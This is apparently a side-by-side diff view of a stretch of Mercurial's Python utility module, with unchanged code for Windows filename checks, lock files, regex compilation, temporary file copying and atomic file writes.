1229 progress(topic, None)
1230
1230
1231 return hardlink, num
1231 return hardlink, num
1232
1232
1233 _winreservednames = {
1233 _winreservednames = {
1234 'con', 'prn', 'aux', 'nul',
1234 'con', 'prn', 'aux', 'nul',
1235 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1235 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1236 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1236 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1237 }
1237 }
1238 _winreservedchars = ':*?"<>|'
1238 _winreservedchars = ':*?"<>|'
1239 def checkwinfilename(path):
1239 def checkwinfilename(path):
1240 r'''Check that the base-relative path is a valid filename on Windows.
1240 r'''Check that the base-relative path is a valid filename on Windows.
1241 Returns None if the path is ok, or a UI string describing the problem.
1241 Returns None if the path is ok, or a UI string describing the problem.
1242
1242
1243 >>> checkwinfilename(b"just/a/normal/path")
1243 >>> checkwinfilename(b"just/a/normal/path")
1244 >>> checkwinfilename(b"foo/bar/con.xml")
1244 >>> checkwinfilename(b"foo/bar/con.xml")
1245 "filename contains 'con', which is reserved on Windows"
1245 "filename contains 'con', which is reserved on Windows"
1246 >>> checkwinfilename(b"foo/con.xml/bar")
1246 >>> checkwinfilename(b"foo/con.xml/bar")
1247 "filename contains 'con', which is reserved on Windows"
1247 "filename contains 'con', which is reserved on Windows"
1248 >>> checkwinfilename(b"foo/bar/xml.con")
1248 >>> checkwinfilename(b"foo/bar/xml.con")
1249 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1249 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1250 "filename contains 'AUX', which is reserved on Windows"
1250 "filename contains 'AUX', which is reserved on Windows"
1251 >>> checkwinfilename(b"foo/bar/bla:.txt")
1251 >>> checkwinfilename(b"foo/bar/bla:.txt")
1252 "filename contains ':', which is reserved on Windows"
1252 "filename contains ':', which is reserved on Windows"
1253 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1253 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1254 "filename contains '\\x07', which is invalid on Windows"
1254 "filename contains '\\x07', which is invalid on Windows"
1255 >>> checkwinfilename(b"foo/bar/bla ")
1255 >>> checkwinfilename(b"foo/bar/bla ")
1256 "filename ends with ' ', which is not allowed on Windows"
1256 "filename ends with ' ', which is not allowed on Windows"
1257 >>> checkwinfilename(b"../bar")
1257 >>> checkwinfilename(b"../bar")
1258 >>> checkwinfilename(b"foo\\")
1258 >>> checkwinfilename(b"foo\\")
1259 "filename ends with '\\', which is invalid on Windows"
1259 "filename ends with '\\', which is invalid on Windows"
1260 >>> checkwinfilename(b"foo\\/bar")
1260 >>> checkwinfilename(b"foo\\/bar")
1261 "directory name ends with '\\', which is invalid on Windows"
1261 "directory name ends with '\\', which is invalid on Windows"
1262 '''
1262 '''
1263 if path.endswith('\\'):
1263 if path.endswith('\\'):
1264 return _("filename ends with '\\', which is invalid on Windows")
1264 return _("filename ends with '\\', which is invalid on Windows")
1265 if '\\/' in path:
1265 if '\\/' in path:
1266 return _("directory name ends with '\\', which is invalid on Windows")
1266 return _("directory name ends with '\\', which is invalid on Windows")
1267 for n in path.replace('\\', '/').split('/'):
1267 for n in path.replace('\\', '/').split('/'):
1268 if not n:
1268 if not n:
1269 continue
1269 continue
1270 for c in _filenamebytestr(n):
1270 for c in _filenamebytestr(n):
1271 if c in _winreservedchars:
1271 if c in _winreservedchars:
1272 return _("filename contains '%s', which is reserved "
1272 return _("filename contains '%s', which is reserved "
1273 "on Windows") % c
1273 "on Windows") % c
1274 if ord(c) <= 31:
1274 if ord(c) <= 31:
1275 return _("filename contains %r, which is invalid "
1275 return _("filename contains %r, which is invalid "
1276 "on Windows") % c
1276 "on Windows") % c
1277 base = n.split('.')[0]
1277 base = n.split('.')[0]
1278 if base and base.lower() in _winreservednames:
1278 if base and base.lower() in _winreservednames:
1279 return _("filename contains '%s', which is reserved "
1279 return _("filename contains '%s', which is reserved "
1280 "on Windows") % base
1280 "on Windows") % base
1281 t = n[-1]
1281 t = n[-1]
1282 if t in '. ' and n not in '..':
1282 if t in '. ' and n not in '..':
1283 return _("filename ends with '%s', which is not allowed "
1283 return _("filename ends with '%s', which is not allowed "
1284 "on Windows") % t
1284 "on Windows") % t
1285
1285
1286 if pycompat.osname == 'nt':
1286 if pycompat.osname == 'nt':
1287 checkosfilename = checkwinfilename
1287 checkosfilename = checkwinfilename
1288 timer = time.clock
1288 timer = time.clock
1289 else:
1289 else:
1290 checkosfilename = platform.checkosfilename
1290 checkosfilename = platform.checkosfilename
1291 timer = time.time
1291 timer = time.time
1292
1292
1293 if safehasattr(time, "perf_counter"):
1293 if safehasattr(time, "perf_counter"):
1294 timer = time.perf_counter
1294 timer = time.perf_counter
1295
1295
1296 def makelock(info, pathname):
1296 def makelock(info, pathname):
1297 try:
1297 try:
1298 return os.symlink(info, pathname)
1298 return os.symlink(info, pathname)
1299 except OSError as why:
1299 except OSError as why:
1300 if why.errno == errno.EEXIST:
1300 if why.errno == errno.EEXIST:
1301 raise
1301 raise
1302 except AttributeError: # no symlink in os
1302 except AttributeError: # no symlink in os
1303 pass
1303 pass
1304
1304
1305 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1305 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1306 os.write(ld, info)
1306 os.write(ld, info)
1307 os.close(ld)
1307 os.close(ld)
1308
1308
1309 def readlock(pathname):
1309 def readlock(pathname):
1310 try:
1310 try:
1311 return os.readlink(pathname)
1311 return os.readlink(pathname)
1312 except OSError as why:
1312 except OSError as why:
1313 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1313 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1314 raise
1314 raise
1315 except AttributeError: # no symlink in os
1315 except AttributeError: # no symlink in os
1316 pass
1316 pass
1317 fp = posixfile(pathname)
1317 fp = posixfile(pathname)
1318 r = fp.read()
1318 r = fp.read()
1319 fp.close()
1319 fp.close()
1320 return r
1320 return r
1321
1321
1322 def fstat(fp):
1322 def fstat(fp):
1323 '''stat file object that may not have fileno method.'''
1323 '''stat file object that may not have fileno method.'''
1324 try:
1324 try:
1325 return os.fstat(fp.fileno())
1325 return os.fstat(fp.fileno())
1326 except AttributeError:
1326 except AttributeError:
1327 return os.stat(fp.name)
1327 return os.stat(fp.name)
1328
1328
1329 # File system features
1329 # File system features
1330
1330
1331 def fscasesensitive(path):
1331 def fscasesensitive(path):
1332 """
1332 """
1333 Return true if the given path is on a case-sensitive filesystem
1333 Return true if the given path is on a case-sensitive filesystem
1334
1334
1335 Requires a path (like /foo/.hg) ending with a foldable final
1335 Requires a path (like /foo/.hg) ending with a foldable final
1336 directory component.
1336 directory component.
1337 """
1337 """
1338 s1 = os.lstat(path)
1338 s1 = os.lstat(path)
1339 d, b = os.path.split(path)
1339 d, b = os.path.split(path)
1340 b2 = b.upper()
1340 b2 = b.upper()
1341 if b == b2:
1341 if b == b2:
1342 b2 = b.lower()
1342 b2 = b.lower()
1343 if b == b2:
1343 if b == b2:
1344 return True # no evidence against case sensitivity
1344 return True # no evidence against case sensitivity
1345 p2 = os.path.join(d, b2)
1345 p2 = os.path.join(d, b2)
1346 try:
1346 try:
1347 s2 = os.lstat(p2)
1347 s2 = os.lstat(p2)
1348 if s2 == s1:
1348 if s2 == s1:
1349 return False
1349 return False
1350 return True
1350 return True
1351 except OSError:
1351 except OSError:
1352 return True
1352 return True
1353
1353
1354 try:
1354 try:
1355 import re2
1355 import re2
1356 _re2 = None
1356 _re2 = None
1357 except ImportError:
1357 except ImportError:
1358 _re2 = False
1358 _re2 = False
1359
1359
1360 class _re(object):
1360 class _re(object):
1361 def _checkre2(self):
1361 def _checkre2(self):
1362 global _re2
1362 global _re2
1363 try:
1363 try:
1364 # check if match works, see issue3964
1364 # check if match works, see issue3964
1365 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1365 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1366 except ImportError:
1366 except ImportError:
1367 _re2 = False
1367 _re2 = False
1368
1368
1369 def compile(self, pat, flags=0):
1369 def compile(self, pat, flags=0):
1370 '''Compile a regular expression, using re2 if possible
1370 '''Compile a regular expression, using re2 if possible
1371
1371
1372 For best performance, use only re2-compatible regexp features. The
1372 For best performance, use only re2-compatible regexp features. The
1373 only flags from the re module that are re2-compatible are
1373 only flags from the re module that are re2-compatible are
1374 IGNORECASE and MULTILINE.'''
1374 IGNORECASE and MULTILINE.'''
1375 if _re2 is None:
1375 if _re2 is None:
1376 self._checkre2()
1376 self._checkre2()
1377 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1377 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1378 if flags & remod.IGNORECASE:
1378 if flags & remod.IGNORECASE:
1379 pat = '(?i)' + pat
1379 pat = '(?i)' + pat
1380 if flags & remod.MULTILINE:
1380 if flags & remod.MULTILINE:
1381 pat = '(?m)' + pat
1381 pat = '(?m)' + pat
1382 try:
1382 try:
1383 return re2.compile(pat)
1383 return re2.compile(pat)
1384 except re2.error:
1384 except re2.error:
1385 pass
1385 pass
1386 return remod.compile(pat, flags)
1386 return remod.compile(pat, flags)
1387
1387
1388 @propertycache
1388 @propertycache
1389 def escape(self):
1389 def escape(self):
1390 '''Return the version of escape corresponding to self.compile.
1390 '''Return the version of escape corresponding to self.compile.
1391
1391
1392 This is imperfect because whether re2 or re is used for a particular
1392 This is imperfect because whether re2 or re is used for a particular
1393 function depends on the flags, etc, but it's the best we can do.
1393 function depends on the flags, etc, but it's the best we can do.
1394 '''
1394 '''
1395 global _re2
1395 global _re2
1396 if _re2 is None:
1396 if _re2 is None:
1397 self._checkre2()
1397 self._checkre2()
1398 if _re2:
1398 if _re2:
1399 return re2.escape
1399 return re2.escape
1400 else:
1400 else:
1401 return remod.escape
1401 return remod.escape
1402
1402
1403 re = _re()
1403 re = _re()
1404
1404
1405 _fspathcache = {}
1405 _fspathcache = {}
1406 def fspath(name, root):
1406 def fspath(name, root):
1407 '''Get name in the case stored in the filesystem
1407 '''Get name in the case stored in the filesystem
1408
1408
1409 The name should be relative to root, and be normcase-ed for efficiency.
1409 The name should be relative to root, and be normcase-ed for efficiency.
1410
1410
1411 Note that this function is unnecessary, and should not be
1411 Note that this function is unnecessary, and should not be
1412 called, for case-sensitive filesystems (simply because it's expensive).
1412 called, for case-sensitive filesystems (simply because it's expensive).
1413
1413
1414 The root should be normcase-ed, too.
1414 The root should be normcase-ed, too.
1415 '''
1415 '''
1416 def _makefspathcacheentry(dir):
1416 def _makefspathcacheentry(dir):
1417 return dict((normcase(n), n) for n in os.listdir(dir))
1417 return dict((normcase(n), n) for n in os.listdir(dir))
1418
1418
1419 seps = pycompat.ossep
1419 seps = pycompat.ossep
1420 if pycompat.osaltsep:
1420 if pycompat.osaltsep:
1421 seps = seps + pycompat.osaltsep
1421 seps = seps + pycompat.osaltsep
1422 # Protect backslashes. This gets silly very quickly.
1422 # Protect backslashes. This gets silly very quickly.
1423 seps.replace('\\','\\\\')
1423 seps.replace('\\','\\\\')
1424 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1424 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1425 dir = os.path.normpath(root)
1425 dir = os.path.normpath(root)
1426 result = []
1426 result = []
1427 for part, sep in pattern.findall(name):
1427 for part, sep in pattern.findall(name):
1428 if sep:
1428 if sep:
1429 result.append(sep)
1429 result.append(sep)
1430 continue
1430 continue
1431
1431
1432 if dir not in _fspathcache:
1432 if dir not in _fspathcache:
1433 _fspathcache[dir] = _makefspathcacheentry(dir)
1433 _fspathcache[dir] = _makefspathcacheentry(dir)
1434 contents = _fspathcache[dir]
1434 contents = _fspathcache[dir]
1435
1435
1436 found = contents.get(part)
1436 found = contents.get(part)
1437 if not found:
1437 if not found:
1438 # retry "once per directory" per "dirstate.walk" which
1438 # retry "once per directory" per "dirstate.walk" which
1439 # may take place for each patches of "hg qpush", for example
1439 # may take place for each patches of "hg qpush", for example
1440 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1440 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1441 found = contents.get(part)
1441 found = contents.get(part)
1442
1442
1443 result.append(found or part)
1443 result.append(found or part)
1444 dir = os.path.join(dir, part)
1444 dir = os.path.join(dir, part)
1445
1445
1446 return ''.join(result)
1446 return ''.join(result)
1447
1447
1448 def getfstype(dirpath):
1448 def getfstype(dirpath):
1449 '''Get the filesystem type name from a directory (best-effort)
1449 '''Get the filesystem type name from a directory (best-effort)
1450
1450
1451 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1451 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1452 '''
1452 '''
1453 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1453 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1454
1454
1455 def checknlink(testfile):
1455 def checknlink(testfile):
1456 '''check whether hardlink count reporting works properly'''
1456 '''check whether hardlink count reporting works properly'''
1457
1457
1458 # testfile may be open, so we need a separate file for checking to
1458 # testfile may be open, so we need a separate file for checking to
1459 # work around issue2543 (or testfile may get lost on Samba shares)
1459 # work around issue2543 (or testfile may get lost on Samba shares)
1460 f1, f2, fp = None, None, None
1460 f1, f2, fp = None, None, None
1461 try:
1461 try:
1462 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1462 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1463 suffix='1~', dir=os.path.dirname(testfile))
1463 suffix='1~', dir=os.path.dirname(testfile))
1464 os.close(fd)
1464 os.close(fd)
1465 f2 = '%s2~' % f1[:-2]
1465 f2 = '%s2~' % f1[:-2]
1466
1466
1467 oslink(f1, f2)
1467 oslink(f1, f2)
1468 # nlinks() may behave differently for files on Windows shares if
1468 # nlinks() may behave differently for files on Windows shares if
1469 # the file is open.
1469 # the file is open.
1470 fp = posixfile(f2)
1470 fp = posixfile(f2)
1471 return nlinks(f2) > 1
1471 return nlinks(f2) > 1
1472 except OSError:
1472 except OSError:
1473 return False
1473 return False
1474 finally:
1474 finally:
1475 if fp is not None:
1475 if fp is not None:
1476 fp.close()
1476 fp.close()
1477 for f in (f1, f2):
1477 for f in (f1, f2):
1478 try:
1478 try:
1479 if f is not None:
1479 if f is not None:
1480 os.unlink(f)
1480 os.unlink(f)
1481 except OSError:
1481 except OSError:
1482 pass
1482 pass
1483
1483
1484 def endswithsep(path):
1484 def endswithsep(path):
1485 '''Check path ends with os.sep or os.altsep.'''
1485 '''Check path ends with os.sep or os.altsep.'''
1486 return (path.endswith(pycompat.ossep)
1486 return (path.endswith(pycompat.ossep)
1487 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1487 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1488
1488
1489 def splitpath(path):
1489 def splitpath(path):
1490 '''Split path by os.sep.
1490 '''Split path by os.sep.
1491 Note that this function does not use os.altsep because this is
1491 Note that this function does not use os.altsep because this is
1492 an alternative of simple "xxx.split(os.sep)".
1492 an alternative of simple "xxx.split(os.sep)".
1493 It is recommended to use os.path.normpath() before using this
1493 It is recommended to use os.path.normpath() before using this
1494 function if need.'''
1494 function if need.'''
1495 return path.split(pycompat.ossep)
1495 return path.split(pycompat.ossep)
1496
1496
1497 def gui():
1497 def gui():
1498 '''Are we running in a GUI?'''
1498 '''Are we running in a GUI?'''
1499 if pycompat.sysplatform == 'darwin':
1499 if pycompat.sysplatform == 'darwin':
1500 if 'SSH_CONNECTION' in encoding.environ:
1500 if 'SSH_CONNECTION' in encoding.environ:
1501 # handle SSH access to a box where the user is logged in
1501 # handle SSH access to a box where the user is logged in
1502 return False
1502 return False
1503 elif getattr(osutil, 'isgui', None):
1503 elif getattr(osutil, 'isgui', None):
1504 # check if a CoreGraphics session is available
1504 # check if a CoreGraphics session is available
1505 return osutil.isgui()
1505 return osutil.isgui()
1506 else:
1506 else:
1507 # pure build; use a safe default
1507 # pure build; use a safe default
1508 return True
1508 return True
1509 else:
1509 else:
1510 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1510 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1511
1511
1512 def mktempcopy(name, emptyok=False, createmode=None):
1512 def mktempcopy(name, emptyok=False, createmode=None):
1513 """Create a temporary file with the same contents from name
1513 """Create a temporary file with the same contents from name
1514
1514
1515 The permission bits are copied from the original file.
1515 The permission bits are copied from the original file.
1516
1516
1517 If the temporary file is going to be truncated immediately, you
1517 If the temporary file is going to be truncated immediately, you
1518 can use emptyok=True as an optimization.
1518 can use emptyok=True as an optimization.
1519
1519
1520 Returns the name of the temporary file.
1520 Returns the name of the temporary file.
1521 """
1521 """
1522 d, fn = os.path.split(name)
1522 d, fn = os.path.split(name)
1523 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1523 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1524 os.close(fd)
1524 os.close(fd)
1525 # Temporary files are created with mode 0600, which is usually not
1525 # Temporary files are created with mode 0600, which is usually not
1526 # what we want. If the original file already exists, just copy
1526 # what we want. If the original file already exists, just copy
1527 # its mode. Otherwise, manually obey umask.
1527 # its mode. Otherwise, manually obey umask.
1528 copymode(name, temp, createmode)
1528 copymode(name, temp, createmode)
1529 if emptyok:
1529 if emptyok:
1530 return temp
1530 return temp
1531 try:
1531 try:
1532 try:
1532 try:
1533 ifp = posixfile(name, "rb")
1533 ifp = posixfile(name, "rb")
1534 except IOError as inst:
1534 except IOError as inst:
1535 if inst.errno == errno.ENOENT:
1535 if inst.errno == errno.ENOENT:
1536 return temp
1536 return temp
1537 if not getattr(inst, 'filename', None):
1537 if not getattr(inst, 'filename', None):
1538 inst.filename = name
1538 inst.filename = name
1539 raise
1539 raise
1540 ofp = posixfile(temp, "wb")
1540 ofp = posixfile(temp, "wb")
1541 for chunk in filechunkiter(ifp):
1541 for chunk in filechunkiter(ifp):
1542 ofp.write(chunk)
1542 ofp.write(chunk)
1543 ifp.close()
1543 ifp.close()
1544 ofp.close()
1544 ofp.close()
1545 except: # re-raises
1545 except: # re-raises
1546 try: os.unlink(temp)
1546 try: os.unlink(temp)
1547 except OSError: pass
1547 except OSError: pass
1548 raise
1548 raise
1549 return temp
1549 return temp
1550
1550
1551 class filestat(object):
1551 class filestat(object):
1552 """help to exactly detect change of a file
1552 """help to exactly detect change of a file
1553
1553
1554 'stat' attribute is result of 'os.stat()' if specified 'path'
1554 'stat' attribute is result of 'os.stat()' if specified 'path'
1555 exists. Otherwise, it is None. This can avoid preparative
1555 exists. Otherwise, it is None. This can avoid preparative
1556 'exists()' examination on client side of this class.
1556 'exists()' examination on client side of this class.
1557 """
1557 """
1558 def __init__(self, stat):
1558 def __init__(self, stat):
1559 self.stat = stat
1559 self.stat = stat
1560
1560
1561 @classmethod
1561 @classmethod
1562 def frompath(cls, path):
1562 def frompath(cls, path):
1563 try:
1563 try:
1564 stat = os.stat(path)
1564 stat = os.stat(path)
1565 except OSError as err:
1565 except OSError as err:
1566 if err.errno != errno.ENOENT:
1566 if err.errno != errno.ENOENT:
1567 raise
1567 raise
1568 stat = None
1568 stat = None
1569 return cls(stat)
1569 return cls(stat)
1570
1570
1571 @classmethod
1571 @classmethod
1572 def fromfp(cls, fp):
1572 def fromfp(cls, fp):
1573 stat = os.fstat(fp.fileno())
1573 stat = os.fstat(fp.fileno())
1574 return cls(stat)
1574 return cls(stat)
1575
1575
1576 __hash__ = object.__hash__
1576 __hash__ = object.__hash__
1577
1577
1578 def __eq__(self, old):
1578 def __eq__(self, old):
1579 try:
1579 try:
1580 # if ambiguity between stat of new and old file is
1580 # if ambiguity between stat of new and old file is
1581 # avoided, comparison of size, ctime and mtime is enough
1581 # avoided, comparison of size, ctime and mtime is enough
1582 # to exactly detect change of a file regardless of platform
1582 # to exactly detect change of a file regardless of platform
1583 return (self.stat.st_size == old.stat.st_size and
1583 return (self.stat.st_size == old.stat.st_size and
1584 self.stat.st_ctime == old.stat.st_ctime and
1584 self.stat.st_ctime == old.stat.st_ctime and
1585 self.stat.st_mtime == old.stat.st_mtime)
1585 self.stat.st_mtime == old.stat.st_mtime)
1586 except AttributeError:
1586 except AttributeError:
1587 pass
1587 pass
1588 try:
1588 try:
1589 return self.stat is None and old.stat is None
1589 return self.stat is None and old.stat is None
1590 except AttributeError:
1590 except AttributeError:
1591 return False
1591 return False
1592
1592
1593 def isambig(self, old):
1593 def isambig(self, old):
1594 """Examine whether new (= self) stat is ambiguous against old one
1594 """Examine whether new (= self) stat is ambiguous against old one
1595
1595
1596 "S[N]" below means stat of a file at N-th change:
1596 "S[N]" below means stat of a file at N-th change:
1597
1597
1598 - S[n-1].ctime < S[n].ctime: can detect change of a file
1598 - S[n-1].ctime < S[n].ctime: can detect change of a file
1599 - S[n-1].ctime == S[n].ctime
1599 - S[n-1].ctime == S[n].ctime
1600 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1600 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1601 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1601 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1602 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1602 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1603 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1603 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1604
1604
1605 Case (*2) above means that a file was changed twice or more at
1605 Case (*2) above means that a file was changed twice or more at
1606 same time in sec (= S[n-1].ctime), and comparison of timestamp
1606 same time in sec (= S[n-1].ctime), and comparison of timestamp
1607 is ambiguous.
1607 is ambiguous.
1608
1608
1609 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1609 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1610 timestamp is ambiguous".
1610 timestamp is ambiguous".
1611
1611
1612 But advancing mtime only in case (*2) doesn't work as
1612 But advancing mtime only in case (*2) doesn't work as
1613 expected, because naturally advanced S[n].mtime in case (*1)
1613 expected, because naturally advanced S[n].mtime in case (*1)
1614 might be equal to manually advanced S[n-1 or earlier].mtime.
1614 might be equal to manually advanced S[n-1 or earlier].mtime.
1615
1615
1616 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1616 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1617 treated as ambiguous regardless of mtime, to avoid overlooking
1617 treated as ambiguous regardless of mtime, to avoid overlooking
1618 by confliction between such mtime.
1618 by confliction between such mtime.
1619
1619
1620 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1620 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1621 S[n].mtime", even if size of a file isn't changed.
1621 S[n].mtime", even if size of a file isn't changed.
1622 """
1622 """
1623 try:
1623 try:
1624 return (self.stat.st_ctime == old.stat.st_ctime)
1624 return (self.stat.st_ctime == old.stat.st_ctime)
1625 except AttributeError:
1625 except AttributeError:
1626 return False
1626 return False
1627
1627
1628 def avoidambig(self, path, old):
1628 def avoidambig(self, path, old):
1629 """Change file stat of specified path to avoid ambiguity
1629 """Change file stat of specified path to avoid ambiguity
1630
1630
1631 'old' should be previous filestat of 'path'.
1631 'old' should be previous filestat of 'path'.
1632
1632
1633 This skips avoiding ambiguity, if a process doesn't have
1633 This skips avoiding ambiguity, if a process doesn't have
1634 appropriate privileges for 'path'. This returns False in this
1634 appropriate privileges for 'path'. This returns False in this
1635 case.
1635 case.
1636
1636
1637 Otherwise, this returns True, as "ambiguity is avoided".
1637 Otherwise, this returns True, as "ambiguity is avoided".
1638 """
1638 """
1639 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1639 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1640 try:
1640 try:
1641 os.utime(path, (advanced, advanced))
1641 os.utime(path, (advanced, advanced))
1642 except OSError as inst:
1642 except OSError as inst:
1643 if inst.errno == errno.EPERM:
1643 if inst.errno == errno.EPERM:
1644 # utime() on the file created by another user causes EPERM,
1644 # utime() on the file created by another user causes EPERM,
1645 # if a process doesn't have appropriate privileges
1645 # if a process doesn't have appropriate privileges
1646 return False
1646 return False
1647 raise
1647 raise
1648 return True
1648 return True
1649
1649
1650 def __ne__(self, other):
1650 def __ne__(self, other):
1651 return not self == other
1651 return not self == other
1652
1652
1653 class atomictempfile(object):
1653 class atomictempfile(object):
1654 '''writable file object that atomically updates a file
1654 '''writable file object that atomically updates a file
1655
1655
1656 All writes will go to a temporary copy of the original file. Call
1656 All writes will go to a temporary copy of the original file. Call
1657 close() when you are done writing, and atomictempfile will rename
1657 close() when you are done writing, and atomictempfile will rename
1658 the temporary copy to the original name, making the changes
1658 the temporary copy to the original name, making the changes
1659 visible. If the object is destroyed without being closed, all your
1659 visible. If the object is destroyed without being closed, all your
1660 writes are discarded.
1660 writes are discarded.
1661
1661
1662 checkambig argument of constructor is used with filestat, and is
1662 checkambig argument of constructor is used with filestat, and is
1663 useful only if target file is guarded by any lock (e.g. repo.lock
1663 useful only if target file is guarded by any lock (e.g. repo.lock
1664 or repo.wlock).
1664 or repo.wlock).
1665 '''
1665 '''
1666 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1666 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1667 self.__name = name # permanent name
1667 self.__name = name # permanent name
1668 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1668 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1669 createmode=createmode)
1669 createmode=createmode)
1670 self._fp = posixfile(self._tempname, mode)
1670 self._fp = posixfile(self._tempname, mode)
1671 self._checkambig = checkambig
1671 self._checkambig = checkambig
1672
1672
1673 # delegated methods
1673 # delegated methods
1674 self.read = self._fp.read
1674 self.read = self._fp.read
1675 self.write = self._fp.write
1675 self.write = self._fp.write
1676 self.seek = self._fp.seek
1676 self.seek = self._fp.seek
1677 self.tell = self._fp.tell
1677 self.tell = self._fp.tell
1678 self.fileno = self._fp.fileno
1678 self.fileno = self._fp.fileno
1679
1679
1680 def close(self):
1680 def close(self):
1681 if not self._fp.closed:
1681 if not self._fp.closed:
1682 self._fp.close()
1682 self._fp.close()
1683 filename = localpath(self.__name)
1683 filename = localpath(self.__name)
1684 oldstat = self._checkambig and filestat.frompath(filename)
1684 oldstat = self._checkambig and filestat.frompath(filename)
1685 if oldstat and oldstat.stat:
1685 if oldstat and oldstat.stat:
1686 rename(self._tempname, filename)
1686 rename(self._tempname, filename)
1687 newstat = filestat.frompath(filename)
1687 newstat = filestat.frompath(filename)
1688 if newstat.isambig(oldstat):
1688 if newstat.isambig(oldstat):
1689 # stat of changed file is ambiguous to original one
1689 # stat of changed file is ambiguous to original one
1690 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1690 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1691 os.utime(filename, (advanced, advanced))
1691 os.utime(filename, (advanced, advanced))
1692 else:
1692 else:
1693 rename(self._tempname, filename)
1693 rename(self._tempname, filename)
1694
1694
1695 def discard(self):
1695 def discard(self):
1696 if not self._fp.closed:
1696 if not self._fp.closed:
1697 try:
1697 try:
1698 os.unlink(self._tempname)
1698 os.unlink(self._tempname)
1699 except OSError:
1699 except OSError:
1700 pass
1700 pass
1701 self._fp.close()
1701 self._fp.close()
1702
1702
1703 def __del__(self):
1703 def __del__(self):
1704 if safehasattr(self, '_fp'): # constructor actually did something
1704 if safehasattr(self, '_fp'): # constructor actually did something
1705 self.discard()
1705 self.discard()
1706
1706
1707 def __enter__(self):
1707 def __enter__(self):
1708 return self
1708 return self
1709
1709
1710 def __exit__(self, exctype, excvalue, traceback):
1710 def __exit__(self, exctype, excvalue, traceback):
1711 if exctype is not None:
1711 if exctype is not None:
1712 self.discard()
1712 self.discard()
1713 else:
1713 else:
1714 self.close()
1714 self.close()
1715
1715
1716 def unlinkpath(f, ignoremissing=False):
1716 def unlinkpath(f, ignoremissing=False):
1717 """unlink and remove the directory if it is empty"""
1717 """unlink and remove the directory if it is empty"""
1718 if ignoremissing:
1718 if ignoremissing:
1719 tryunlink(f)
1719 tryunlink(f)
1720 else:
1720 else:
1721 unlink(f)
1721 unlink(f)
1722 # try removing directories that might now be empty
1722 # try removing directories that might now be empty
1723 try:
1723 try:
1724 removedirs(os.path.dirname(f))
1724 removedirs(os.path.dirname(f))
1725 except OSError:
1725 except OSError:
1726 pass
1726 pass
1727
1727
1728 def tryunlink(f):
1728 def tryunlink(f):
1729 """Attempt to remove a file, ignoring ENOENT errors."""
1729 """Attempt to remove a file, ignoring ENOENT errors."""
1730 try:
1730 try:
1731 unlink(f)
1731 unlink(f)
1732 except OSError as e:
1732 except OSError as e:
1733 if e.errno != errno.ENOENT:
1733 if e.errno != errno.ENOENT:
1734 raise
1734 raise
1735
1735
1736 def makedirs(name, mode=None, notindexed=False):
1736 def makedirs(name, mode=None, notindexed=False):
1737 """recursive directory creation with parent mode inheritance
1737 """recursive directory creation with parent mode inheritance
1738
1738
1739 Newly created directories are marked as "not to be indexed by
1739 Newly created directories are marked as "not to be indexed by
1740 the content indexing service", if ``notindexed`` is specified
1740 the content indexing service", if ``notindexed`` is specified
1741 for "write" mode access.
1741 for "write" mode access.
1742 """
1742 """
1743 try:
1743 try:
1744 makedir(name, notindexed)
1744 makedir(name, notindexed)
